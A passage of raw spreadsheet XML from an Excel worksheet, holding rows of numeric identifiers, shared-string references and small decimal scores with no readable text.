        <v>5.4540187E7</v>
      </c>
      <c r="C14600" s="2" t="s">
        <v>14072</v>
      </c>
      <c r="D14600" s="2">
        <v>1.0</v>
      </c>
      <c r="E14600" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14600" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="14601" ht="15.75" customHeight="1">
      <c r="A14601" s="1">
        <v>9163.0</v>
      </c>
      <c r="B14601" s="2">
        <v>5.5305669E7</v>
      </c>
      <c r="C14601" s="2" t="s">
        <v>14073</v>
      </c>
      <c r="D14601" s="2">
        <v>1.0</v>
      </c>
      <c r="E14601" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14601" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="14602" ht="15.75" customHeight="1">
      <c r="A14602" s="1">
        <v>11274.0</v>
      </c>
      <c r="B14602" s="2">
        <v>2.0727288E7</v>
      </c>
      <c r="C14602" s="2" t="s">
        <v>14074</v>
      </c>
      <c r="D14602" s="2">
        <v>1.0</v>
      </c>
      <c r="E14602" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14602" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="14603" ht="15.75" customHeight="1">
      <c r="A14603" s="1">
        <v>11829.0</v>
      </c>
      <c r="B14603" s="2">
        <v>2.4654515E7</v>
      </c>
      <c r="C14603" s="2" t="s">
        <v>14075</v>
      </c>
      <c r="D14603" s="2">
        <v>1.0</v>
      </c>
      <c r="E14603" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14603" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="14604" ht="15.75" customHeight="1">
      <c r="A14604" s="1">
        <v>17064.0</v>
      </c>
      <c r="B14604" s="2">
        <v>4.8566767E7</v>
      </c>
      <c r="C14604" s="2" t="s">
        <v>14076</v>
      </c>
      <c r="D14604" s="2">
        <v>1.0</v>
      </c>
      <c r="E14604" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14604" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="14605" ht="15.75" customHeight="1">
      <c r="A14605" s="1">
        <v>32226.0</v>
      </c>
      <c r="B14605" s="2">
        <v>5.4889067E7</v>
      </c>
      <c r="C14605" s="2" t="s">
        <v>14077</v>
      </c>
      <c r="D14605" s="2">
        <v>1.0</v>
      </c>
      <c r="E14605" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14605" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="14606" ht="15.75" customHeight="1">
      <c r="A14606" s="1">
        <v>5726.0</v>
      </c>
      <c r="B14606" s="2">
        <v>4.6603494E7</v>
      </c>
      <c r="C14606" s="2" t="s">
        <v>14078</v>
      </c>
      <c r="D14606" s="2">
        <v>1.0</v>
      </c>
      <c r="E14606" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14606" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="14607" ht="15.75" customHeight="1">
      <c r="A14607" s="1">
        <v>33392.0</v>
      </c>
      <c r="B14607" s="2">
        <v>7690279.0</v>
      </c>
      <c r="C14607" s="2" t="s">
        <v>14079</v>
      </c>
      <c r="D14607" s="2">
        <v>1.0</v>
      </c>
      <c r="E14607" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14607" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="14608" ht="15.75" customHeight="1">
      <c r="A14608" s="1">
        <v>34174.0</v>
      </c>
      <c r="B14608" s="2">
        <v>9932230.0</v>
      </c>
      <c r="C14608" s="2" t="s">
        <v>14080</v>
      </c>
      <c r="D14608" s="2">
        <v>1.0</v>
      </c>
      <c r="E14608" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14608" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="14609" ht="15.75" customHeight="1">
      <c r="A14609" s="1">
        <v>23963.0</v>
      </c>
      <c r="B14609" s="2">
        <v>9017432.0</v>
      </c>
      <c r="C14609" s="2" t="s">
        <v>14081</v>
      </c>
      <c r="D14609" s="2">
        <v>1.0</v>
      </c>
      <c r="E14609" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14609" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="14610" ht="15.75" customHeight="1">
      <c r="A14610" s="1">
        <v>33846.0</v>
      </c>
      <c r="B14610" s="2">
        <v>9017431.0</v>
      </c>
      <c r="C14610" s="2" t="s">
        <v>14081</v>
      </c>
      <c r="D14610" s="2">
        <v>1.0</v>
      </c>
      <c r="E14610" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14610" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="14611" ht="15.75" customHeight="1">
      <c r="A14611" s="1">
        <v>9473.0</v>
      </c>
      <c r="B14611" s="2">
        <v>5.5868571E7</v>
      </c>
      <c r="C14611" s="2" t="s">
        <v>14082</v>
      </c>
      <c r="D14611" s="2">
        <v>1.0</v>
      </c>
      <c r="E14611" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14611" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="14612" ht="15.75" customHeight="1">
      <c r="A14612" s="1">
        <v>27851.0</v>
      </c>
      <c r="B14612" s="2">
        <v>2.342753E7</v>
      </c>
      <c r="C14612" s="2" t="s">
        <v>14083</v>
      </c>
      <c r="D14612" s="2">
        <v>1.0</v>
      </c>
      <c r="E14612" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14612" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="14613" ht="15.75" customHeight="1">
      <c r="A14613" s="1">
        <v>12345.0</v>
      </c>
      <c r="B14613" s="2">
        <v>2.8627993E7</v>
      </c>
      <c r="C14613" s="2" t="s">
        <v>14084</v>
      </c>
      <c r="D14613" s="2">
        <v>1.0</v>
      </c>
      <c r="E14613" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14613" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="14614" ht="15.75" customHeight="1">
      <c r="A14614" s="1">
        <v>14157.0</v>
      </c>
      <c r="B14614" s="2">
        <v>3.8003165E7</v>
      </c>
      <c r="C14614" s="2" t="s">
        <v>14085</v>
      </c>
      <c r="D14614" s="2">
        <v>1.0</v>
      </c>
      <c r="E14614" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14614" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="14615" ht="15.75" customHeight="1">
      <c r="A14615" s="1">
        <v>18812.0</v>
      </c>
      <c r="B14615" s="2">
        <v>5.3903199E7</v>
      </c>
      <c r="C14615" s="2" t="s">
        <v>14086</v>
      </c>
      <c r="D14615" s="2">
        <v>1.0</v>
      </c>
      <c r="E14615" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14615" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="14616" ht="15.75" customHeight="1">
      <c r="A14616" s="1">
        <v>26072.0</v>
      </c>
      <c r="B14616" s="2">
        <v>1.5597997E7</v>
      </c>
      <c r="C14616" s="2" t="s">
        <v>14030</v>
      </c>
      <c r="D14616" s="2">
        <v>1.0</v>
      </c>
      <c r="E14616" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14616" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="14617" ht="15.75" customHeight="1">
      <c r="A14617" s="1">
        <v>30074.0</v>
      </c>
      <c r="B14617" s="2">
        <v>3625318.0</v>
      </c>
      <c r="C14617" s="2" t="s">
        <v>14087</v>
      </c>
      <c r="D14617" s="2">
        <v>1.0</v>
      </c>
      <c r="E14617" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14617" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="14618" ht="15.75" customHeight="1">
      <c r="A14618" s="1">
        <v>33279.0</v>
      </c>
      <c r="B14618" s="2">
        <v>7430209.0</v>
      </c>
      <c r="C14618" s="2" t="s">
        <v>14088</v>
      </c>
      <c r="D14618" s="2">
        <v>1.0</v>
      </c>
      <c r="E14618" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14618" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="14619" ht="15.75" customHeight="1">
      <c r="A14619" s="1">
        <v>33757.0</v>
      </c>
      <c r="B14619" s="2">
        <v>8605420.0</v>
      </c>
      <c r="C14619" s="2" t="s">
        <v>14089</v>
      </c>
      <c r="D14619" s="2">
        <v>1.0</v>
      </c>
      <c r="E14619" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14619" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="14620" ht="15.75" customHeight="1">
      <c r="A14620" s="1">
        <v>6741.0</v>
      </c>
      <c r="B14620" s="2">
        <v>4.9364844E7</v>
      </c>
      <c r="C14620" s="2" t="s">
        <v>14090</v>
      </c>
      <c r="D14620" s="2">
        <v>1.0</v>
      </c>
      <c r="E14620" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14620" s="2">
        <v>0.1217320261437909</v>
      </c>
    </row>
    <row r="14621" ht="15.75" customHeight="1">
      <c r="A14621" s="1">
        <v>26523.0</v>
      </c>
      <c r="B14621" s="2">
        <v>1.7663261E7</v>
      </c>
      <c r="C14621" s="2" t="s">
        <v>14091</v>
      </c>
      <c r="D14621" s="2">
        <v>1.0</v>
      </c>
      <c r="E14621" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14621" s="2">
        <v>0.1217320261437909</v>
      </c>
    </row>
    <row r="14622" ht="15.75" customHeight="1">
      <c r="A14622" s="1">
        <v>3074.0</v>
      </c>
      <c r="B14622" s="2">
        <v>3.6534007E7</v>
      </c>
      <c r="C14622" s="2" t="s">
        <v>14092</v>
      </c>
      <c r="D14622" s="2">
        <v>1.0</v>
      </c>
      <c r="E14622" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14622" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14623" ht="15.75" customHeight="1">
      <c r="A14623" s="1">
        <v>3411.0</v>
      </c>
      <c r="B14623" s="2">
        <v>3.8101909E7</v>
      </c>
      <c r="C14623" s="2" t="s">
        <v>14093</v>
      </c>
      <c r="D14623" s="2">
        <v>1.0</v>
      </c>
      <c r="E14623" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14623" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14624" ht="15.75" customHeight="1">
      <c r="A14624" s="1">
        <v>12787.0</v>
      </c>
      <c r="B14624" s="2">
        <v>3.1365208E7</v>
      </c>
      <c r="C14624" s="2" t="s">
        <v>14094</v>
      </c>
      <c r="D14624" s="2">
        <v>1.0</v>
      </c>
      <c r="E14624" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14624" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14625" ht="15.75" customHeight="1">
      <c r="A14625" s="1">
        <v>15440.0</v>
      </c>
      <c r="B14625" s="2">
        <v>4.2985428E7</v>
      </c>
      <c r="C14625" s="2" t="s">
        <v>14095</v>
      </c>
      <c r="D14625" s="2">
        <v>1.0</v>
      </c>
      <c r="E14625" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14625" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14626" ht="15.75" customHeight="1">
      <c r="A14626" s="1">
        <v>17114.0</v>
      </c>
      <c r="B14626" s="2">
        <v>4.8758868E7</v>
      </c>
      <c r="C14626" s="2" t="s">
        <v>14096</v>
      </c>
      <c r="D14626" s="2">
        <v>1.0</v>
      </c>
      <c r="E14626" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14626" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14627" ht="15.75" customHeight="1">
      <c r="A14627" s="1">
        <v>23375.0</v>
      </c>
      <c r="B14627" s="2">
        <v>5.5433989E7</v>
      </c>
      <c r="C14627" s="2" t="s">
        <v>14097</v>
      </c>
      <c r="D14627" s="2">
        <v>1.0</v>
      </c>
      <c r="E14627" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14627" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14628" ht="15.75" customHeight="1">
      <c r="A14628" s="1">
        <v>24573.0</v>
      </c>
      <c r="B14628" s="2">
        <v>1.1317908E7</v>
      </c>
      <c r="C14628" s="2" t="s">
        <v>14098</v>
      </c>
      <c r="D14628" s="2">
        <v>1.0</v>
      </c>
      <c r="E14628" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14628" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14629" ht="15.75" customHeight="1">
      <c r="A14629" s="1">
        <v>27386.0</v>
      </c>
      <c r="B14629" s="2">
        <v>2.1751555E7</v>
      </c>
      <c r="C14629" s="2" t="s">
        <v>14099</v>
      </c>
      <c r="D14629" s="2">
        <v>1.0</v>
      </c>
      <c r="E14629" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14629" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14630" ht="15.75" customHeight="1">
      <c r="A14630" s="1">
        <v>31072.0</v>
      </c>
      <c r="B14630" s="2">
        <v>4.8275366E7</v>
      </c>
      <c r="C14630" s="2" t="s">
        <v>14100</v>
      </c>
      <c r="D14630" s="2">
        <v>1.0</v>
      </c>
      <c r="E14630" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14630" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14631" ht="15.75" customHeight="1">
      <c r="A14631" s="1">
        <v>31154.0</v>
      </c>
      <c r="B14631" s="2">
        <v>4.8976052E7</v>
      </c>
      <c r="C14631" s="2" t="s">
        <v>14101</v>
      </c>
      <c r="D14631" s="2">
        <v>1.0</v>
      </c>
      <c r="E14631" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14631" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="14632" ht="15.75" customHeight="1">
      <c r="A14632" s="1">
        <v>6692.0</v>
      </c>
      <c r="B14632" s="2">
        <v>4.919074E7</v>
      </c>
      <c r="C14632" s="2" t="s">
        <v>14102</v>
      </c>
      <c r="D14632" s="2">
        <v>1.0</v>
      </c>
      <c r="E14632" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14632" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="14633" ht="15.75" customHeight="1">
      <c r="A14633" s="1">
        <v>16928.0</v>
      </c>
      <c r="B14633" s="2">
        <v>4.8157085E7</v>
      </c>
      <c r="C14633" s="2" t="s">
        <v>14103</v>
      </c>
      <c r="D14633" s="2">
        <v>1.0</v>
      </c>
      <c r="E14633" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14633" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="14634" ht="15.75" customHeight="1">
      <c r="A14634" s="1">
        <v>32702.0</v>
      </c>
      <c r="B14634" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C14634" s="2" t="s">
        <v>14104</v>
      </c>
      <c r="D14634" s="2">
        <v>1.0</v>
      </c>
      <c r="E14634" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14634" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="14635" ht="15.75" customHeight="1">
      <c r="A14635" s="1">
        <v>32762.0</v>
      </c>
      <c r="B14635" s="2">
        <v>6069505.0</v>
      </c>
      <c r="C14635" s="2" t="s">
        <v>14105</v>
      </c>
      <c r="D14635" s="2">
        <v>1.0</v>
      </c>
      <c r="E14635" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14635" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="14636" ht="15.75" customHeight="1">
      <c r="A14636" s="1">
        <v>14921.0</v>
      </c>
      <c r="B14636" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C14636" s="2" t="s">
        <v>14106</v>
      </c>
      <c r="D14636" s="2">
        <v>1.0</v>
      </c>
      <c r="E14636" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14636" s="2">
        <v>0.1215780998389694</v>
      </c>
    </row>
    <row r="14637" ht="15.75" customHeight="1">
      <c r="A14637" s="1">
        <v>8273.0</v>
      </c>
      <c r="B14637" s="2">
        <v>5.3456384E7</v>
      </c>
      <c r="C14637" s="2" t="s">
        <v>14107</v>
      </c>
      <c r="D14637" s="2">
        <v>1.0</v>
      </c>
      <c r="E14637" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14637" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14638" ht="15.75" customHeight="1">
      <c r="A14638" s="1">
        <v>8694.0</v>
      </c>
      <c r="B14638" s="2">
        <v>5.442322E7</v>
      </c>
      <c r="C14638" s="2" t="s">
        <v>14108</v>
      </c>
      <c r="D14638" s="2">
        <v>1.0</v>
      </c>
      <c r="E14638" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14638" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14639" ht="15.75" customHeight="1">
      <c r="A14639" s="1">
        <v>9567.0</v>
      </c>
      <c r="B14639" s="2">
        <v>5.6054529E7</v>
      </c>
      <c r="C14639" s="2" t="s">
        <v>14109</v>
      </c>
      <c r="D14639" s="2">
        <v>1.0</v>
      </c>
      <c r="E14639" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14639" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14640" ht="15.75" customHeight="1">
      <c r="A14640" s="1">
        <v>11296.0</v>
      </c>
      <c r="B14640" s="2">
        <v>2.0960703E7</v>
      </c>
      <c r="C14640" s="2" t="s">
        <v>14110</v>
      </c>
      <c r="D14640" s="2">
        <v>1.0</v>
      </c>
      <c r="E14640" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14640" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14641" ht="15.75" customHeight="1">
      <c r="A14641" s="1">
        <v>13999.0</v>
      </c>
      <c r="B14641" s="2">
        <v>3.7383221E7</v>
      </c>
      <c r="C14641" s="2" t="s">
        <v>14111</v>
      </c>
      <c r="D14641" s="2">
        <v>1.0</v>
      </c>
      <c r="E14641" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14641" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14642" ht="15.75" customHeight="1">
      <c r="A14642" s="1">
        <v>15233.0</v>
      </c>
      <c r="B14642" s="2">
        <v>4.2229002E7</v>
      </c>
      <c r="C14642" s="2" t="s">
        <v>14112</v>
      </c>
      <c r="D14642" s="2">
        <v>1.0</v>
      </c>
      <c r="E14642" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14642" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14643" ht="15.75" customHeight="1">
      <c r="A14643" s="1">
        <v>15263.0</v>
      </c>
      <c r="B14643" s="2">
        <v>4.2317668E7</v>
      </c>
      <c r="C14643" s="2" t="s">
        <v>14113</v>
      </c>
      <c r="D14643" s="2">
        <v>1.0</v>
      </c>
      <c r="E14643" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14643" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14644" ht="15.75" customHeight="1">
      <c r="A14644" s="1">
        <v>18000.0</v>
      </c>
      <c r="B14644" s="2">
        <v>5.1420182E7</v>
      </c>
      <c r="C14644" s="2" t="s">
        <v>14114</v>
      </c>
      <c r="D14644" s="2">
        <v>1.0</v>
      </c>
      <c r="E14644" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14644" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14645" ht="15.75" customHeight="1">
      <c r="A14645" s="1">
        <v>18544.0</v>
      </c>
      <c r="B14645" s="2">
        <v>5.312041E7</v>
      </c>
      <c r="C14645" s="2" t="s">
        <v>14115</v>
      </c>
      <c r="D14645" s="2">
        <v>1.0</v>
      </c>
      <c r="E14645" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14645" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14646" ht="15.75" customHeight="1">
      <c r="A14646" s="1">
        <v>24820.0</v>
      </c>
      <c r="B14646" s="2">
        <v>1.2094355E7</v>
      </c>
      <c r="C14646" s="2" t="s">
        <v>14116</v>
      </c>
      <c r="D14646" s="2">
        <v>1.0</v>
      </c>
      <c r="E14646" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14646" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14647" ht="15.75" customHeight="1">
      <c r="A14647" s="1">
        <v>27271.0</v>
      </c>
      <c r="B14647" s="2">
        <v>2.1219522E7</v>
      </c>
      <c r="C14647" s="2" t="s">
        <v>14117</v>
      </c>
      <c r="D14647" s="2">
        <v>1.0</v>
      </c>
      <c r="E14647" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14647" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14648" ht="15.75" customHeight="1">
      <c r="A14648" s="1">
        <v>27986.0</v>
      </c>
      <c r="B14648" s="2">
        <v>2.4042494E7</v>
      </c>
      <c r="C14648" s="2" t="s">
        <v>14118</v>
      </c>
      <c r="D14648" s="2">
        <v>1.0</v>
      </c>
      <c r="E14648" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14648" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14649" ht="15.75" customHeight="1">
      <c r="A14649" s="1">
        <v>29020.0</v>
      </c>
      <c r="B14649" s="2">
        <v>3.0098801E7</v>
      </c>
      <c r="C14649" s="2" t="s">
        <v>14119</v>
      </c>
      <c r="D14649" s="2">
        <v>1.0</v>
      </c>
      <c r="E14649" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14649" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14650" ht="15.75" customHeight="1">
      <c r="A14650" s="1">
        <v>29168.0</v>
      </c>
      <c r="B14650" s="2">
        <v>3.0627426E7</v>
      </c>
      <c r="C14650" s="2" t="s">
        <v>14120</v>
      </c>
      <c r="D14650" s="2">
        <v>1.0</v>
      </c>
      <c r="E14650" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14650" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14651" ht="15.75" customHeight="1">
      <c r="A14651" s="1">
        <v>30058.0</v>
      </c>
      <c r="B14651" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C14651" s="2" t="s">
        <v>14121</v>
      </c>
      <c r="D14651" s="2">
        <v>1.0</v>
      </c>
      <c r="E14651" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14651" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14652" ht="15.75" customHeight="1">
      <c r="A14652" s="1">
        <v>32333.0</v>
      </c>
      <c r="B14652" s="2">
        <v>5582904.0</v>
      </c>
      <c r="C14652" s="2" t="s">
        <v>14122</v>
      </c>
      <c r="D14652" s="2">
        <v>1.0</v>
      </c>
      <c r="E14652" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14652" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14653" ht="15.75" customHeight="1">
      <c r="A14653" s="1">
        <v>33134.0</v>
      </c>
      <c r="B14653" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C14653" s="2" t="s">
        <v>14123</v>
      </c>
      <c r="D14653" s="2">
        <v>1.0</v>
      </c>
      <c r="E14653" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14653" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="14654" ht="15.75" customHeight="1">
      <c r="A14654" s="1">
        <v>8430.0</v>
      </c>
      <c r="B14654" s="2">
        <v>5.3940073E7</v>
      </c>
      <c r="C14654" s="2" t="s">
        <v>14124</v>
      </c>
      <c r="D14654" s="2">
        <v>1.0</v>
      </c>
      <c r="E14654" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14654" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="14655" ht="15.75" customHeight="1">
      <c r="A14655" s="1">
        <v>9362.0</v>
      </c>
      <c r="B14655" s="2">
        <v>5.5680331E7</v>
      </c>
      <c r="C14655" s="2" t="s">
        <v>14125</v>
      </c>
      <c r="D14655" s="2">
        <v>1.0</v>
      </c>
      <c r="E14655" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14655" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="14656" ht="15.75" customHeight="1">
      <c r="A14656" s="1">
        <v>13066.0</v>
      </c>
      <c r="B14656" s="2">
        <v>3.3315891E7</v>
      </c>
      <c r="C14656" s="2" t="s">
        <v>14126</v>
      </c>
      <c r="D14656" s="2">
        <v>1.0</v>
      </c>
      <c r="E14656" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14656" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="14657" ht="15.75" customHeight="1">
      <c r="A14657" s="1">
        <v>24422.0</v>
      </c>
      <c r="B14657" s="2">
        <v>1.0849956E7</v>
      </c>
      <c r="C14657" s="2" t="s">
        <v>14127</v>
      </c>
      <c r="D14657" s="2">
        <v>1.0</v>
      </c>
      <c r="E14657" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14657" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="14658" ht="15.75" customHeight="1">
      <c r="A14658" s="1">
        <v>25174.0</v>
      </c>
      <c r="B14658" s="2">
        <v>1.3112147E7</v>
      </c>
      <c r="C14658" s="2" t="s">
        <v>14128</v>
      </c>
      <c r="D14658" s="2">
        <v>1.0</v>
      </c>
      <c r="E14658" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14658" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="14659" ht="15.75" customHeight="1">
      <c r="A14659" s="1">
        <v>14529.0</v>
      </c>
      <c r="B14659" s="2">
        <v>3.9827652E7</v>
      </c>
      <c r="C14659" s="2" t="s">
        <v>14129</v>
      </c>
      <c r="D14659" s="2">
        <v>1.0</v>
      </c>
      <c r="E14659" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14659" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="14660" ht="15.75" customHeight="1">
      <c r="A14660" s="1">
        <v>27385.0</v>
      </c>
      <c r="B14660" s="2">
        <v>2.1751555E7</v>
      </c>
      <c r="C14660" s="2" t="s">
        <v>14130</v>
      </c>
      <c r="D14660" s="2">
        <v>1.0</v>
      </c>
      <c r="E14660" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14660" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="14661" ht="15.75" customHeight="1">
      <c r="A14661" s="1">
        <v>2997.0</v>
      </c>
      <c r="B14661" s="2">
        <v>3.6283347E7</v>
      </c>
      <c r="C14661" s="2" t="s">
        <v>14131</v>
      </c>
      <c r="D14661" s="2">
        <v>1.0</v>
      </c>
      <c r="E14661" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14661" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="14662" ht="15.75" customHeight="1">
      <c r="A14662" s="1">
        <v>5282.0</v>
      </c>
      <c r="B14662" s="2">
        <v>4.5189438E7</v>
      </c>
      <c r="C14662" s="2" t="s">
        <v>14132</v>
      </c>
      <c r="D14662" s="2">
        <v>1.0</v>
      </c>
      <c r="E14662" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14662" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="14663" ht="15.75" customHeight="1">
      <c r="A14663" s="1">
        <v>7860.0</v>
      </c>
      <c r="B14663" s="2">
        <v>5.2374124E7</v>
      </c>
      <c r="C14663" s="2" t="s">
        <v>14133</v>
      </c>
      <c r="D14663" s="2">
        <v>1.0</v>
      </c>
      <c r="E14663" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14663" s="2">
        <v>0.1206597222222222</v>
      </c>
    </row>
    <row r="14664" ht="15.75" customHeight="1">
      <c r="A14664" s="1">
        <v>19138.0</v>
      </c>
      <c r="B14664" s="2">
        <v>5.4816861E7</v>
      </c>
      <c r="C14664" s="2" t="s">
        <v>14134</v>
      </c>
      <c r="D14664" s="2">
        <v>1.0</v>
      </c>
      <c r="E14664" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14664" s="2">
        <v>0.1205128205128205</v>
      </c>
    </row>
    <row r="14665" ht="15.75" customHeight="1">
      <c r="A14665" s="1">
        <v>2296.0</v>
      </c>
      <c r="B14665" s="2">
        <v>3.2658448E7</v>
      </c>
      <c r="C14665" s="2" t="s">
        <v>14135</v>
      </c>
      <c r="D14665" s="2">
        <v>1.0</v>
      </c>
      <c r="E14665" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14665" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="14666" ht="15.75" customHeight="1">
      <c r="A14666" s="1">
        <v>10519.0</v>
      </c>
      <c r="B14666" s="2">
        <v>1.1876149E7</v>
      </c>
      <c r="C14666" s="2" t="s">
        <v>14136</v>
      </c>
      <c r="D14666" s="2">
        <v>1.0</v>
      </c>
      <c r="E14666" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14666" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="14667" ht="15.75" customHeight="1">
      <c r="A14667" s="1">
        <v>17838.0</v>
      </c>
      <c r="B14667" s="2">
        <v>5.0931819E7</v>
      </c>
